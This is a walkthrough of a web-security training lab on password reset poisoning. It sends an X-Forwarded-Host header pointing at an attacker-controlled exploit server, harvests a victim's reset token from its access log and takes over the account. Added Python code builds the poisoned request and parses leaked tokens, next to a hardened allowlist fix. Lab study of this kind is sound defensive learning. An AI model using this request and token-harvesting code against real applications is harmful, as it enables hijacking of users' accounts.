apsyleg · 1 min read
#portswigger #authentication #web-security

Password Reset Poisoning via Middleware

Lab

Password reset poisoning via middleware · Practitioner

Solution

Given

This lab is vulnerable to password reset poisoning. The user `carlos` will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account. You can log in to your own account using the following credentials: `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server.

Analyzing the task

Judging by the name, this lab works like the previous one, except that the Host header itself cannot be tampered with directly: we need to override it through one of the X-* style headers that a reverse proxy or middleware honours when it reconstructs the request URL. The first one to try is usually X-Forwarded-Host; the other headers worth trying are:

X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded

Recon

Let's look at the password reset function. We send a reset request for our own user (wiener) and capture it. The first thing to try is overwriting the Host header itself with the exploit server's address. No response at all, the connection is simply dropped (Repeater shows Stream closed).

OK, let's try X-Forwarded-Host. We add to the headers:

X-Forwarded-Host: exploit-0a20001104ed604d802011ff017700f1.exploit-server.net

Works! The reset email for wiener now contains a link pointing at the exploit server instead of the lab, so the middleware builds the link from X-Forwarded-Host. Now, keeping that header, we change the username in the request body to carlos and resend. Carlos clicks the poisoned link, and in the exploit server's access log we see:

/forgot-password?temp-forgot-password-token=j4by8s8k70bbyzg3pj5x6l4d9ymzkl0f

That token was issued for carlos. The exploit server only logs the request, so we take the token and open the same path on the real lab domain, set a new password for carlos, and log in with it.

Lab solved!
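The whole flow, as an added example that is not part of the lab or of PortSwigger's code: a model of the middleware's host resolution (the vulnerable form, which trusts any override header, beside a hardened form that ignores them and allowlists Host), the poisoned reset request, and a parser for the exploit server's access log that recovers the token and rebuilds the reset URL on the real lab host. The hostnames, the token and the log-line format are assumptions made up for the example, not values captured from the lab.

```python
"""Model of password reset poisoning via an override header.

Added example. The host-resolution functions model what the lab's
middleware appears to do; they are not the lab's own code. Hostnames,
token and log lines below are constructed for the example.
"""
import re
from typing import Dict, Iterable, List, Optional, Sequence

# Override headers that proxies and frameworks have been known to honour,
# in the order the walkthrough tries them (lower-cased for lookup).
OVERRIDE_HEADERS = (
    "x-forwarded-host",
    "x-host",
    "x-forwarded-server",
    "x-http-host-override",
    "forwarded",
)

# RFC 7239 Forwarded header, e.g.  for=203.0.113.5;host="evil.example";proto=https
_FORWARDED_HOST_RE = re.compile(r'host=("?)([^;,"]+)\1', re.IGNORECASE)

# Token as it appears in the lab's reset link.
_TOKEN_RE = re.compile(r"temp-forgot-password-token=([0-9a-z]+)")


def _lower(headers: Dict[str, str]) -> Dict[str, str]:
    return {k.lower(): v.strip() for k, v in headers.items()}


def effective_host_vulnerable(headers: Dict[str, str]) -> str:
    """Host the vulnerable middleware believes it was reached on.

    Any attacker-controlled override header wins over Host. This is the
    bug the lab exploits: the reset link is built from this value.
    """
    h = _lower(headers)
    for name in OVERRIDE_HEADERS:
        if name not in h:
            continue
        if name == "forwarded":
            m = _FORWARDED_HOST_RE.search(h[name])
            if m:
                return m.group(2)
            continue
        return h[name]
    return h.get("host", "")


def effective_host_hardened(headers: Dict[str, str],
                            allowed_hosts: Sequence[str]) -> Optional[str]:
    """Hardened variant: override headers are ignored entirely and Host
    must match an allowlist. Returns None when the request is rejected."""
    host = _lower(headers).get("host", "").lower()
    return host if host in {a.lower() for a in allowed_hosts} else None


def build_reset_link(host: str, token: str) -> str:
    """Link the application puts in the reset e-mail (lab's URL shape)."""
    return f"https://{host}/forgot-password?temp-forgot-password-token={token}"


def poisoned_reset_request(lab_host: str, exploit_host: str, username: str) -> str:
    """Raw HTTP/1.1 request equivalent to the one resent from Repeater:
    Host stays legitimate, X-Forwarded-Host points at the exploit server."""
    body = f"username={username}"
    return (
        "POST /forgot-password HTTP/1.1\r\n"
        f"Host: {lab_host}\r\n"
        f"X-Forwarded-Host: {exploit_host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


def extract_tokens(access_log: Iterable[str]) -> List[str]:
    """Pull reset tokens out of exploit-server access-log lines, in order,
    without duplicates (the victim may click more than once)."""
    tokens: List[str] = []
    for line in access_log:
        for m in _TOKEN_RE.finditer(line):
            if m.group(1) not in tokens:
                tokens.append(m.group(1))
    return tokens


def recover_reset_url(lab_host: str, access_log: Iterable[str]) -> Optional[str]:
    """Rebuild the usable reset URL on the real lab host from the first
    token the victim leaked to the exploit server, or None if nothing leaked."""
    tokens = extract_tokens(access_log)
    return build_reset_link(lab_host, tokens[0]) if tokens else None


# Constructed access-log lines (format and token are made up for the example).
SAMPLE_ACCESS_LOG = [
    '10.0.4.2 "GET / HTTP/1.1" 200',
    '10.0.4.9 "GET /forgot-password?temp-forgot-password-token=k3m9qx2v7p0lw4n8 HTTP/1.1" 404',
]

if __name__ == "__main__":
    attacker = {"Host": "lab.example", "X-Forwarded-Host": "exploit.example"}
    print("vulnerable builds link on:", effective_host_vulnerable(attacker))
    print("hardened resolves to:", effective_host_hardened(attacker, ["lab.example"]))
    print("usable link:", recover_reset_url("lab.example", SAMPLE_ACCESS_LOG))
```

The hardened resolver is the check to look for when reviewing a reset flow: the link must be built from a configured canonical host, and the Host header only consulted against an allowlist, never the X-Forwarded-* family unless the proxy in front strips client-supplied copies of those headers.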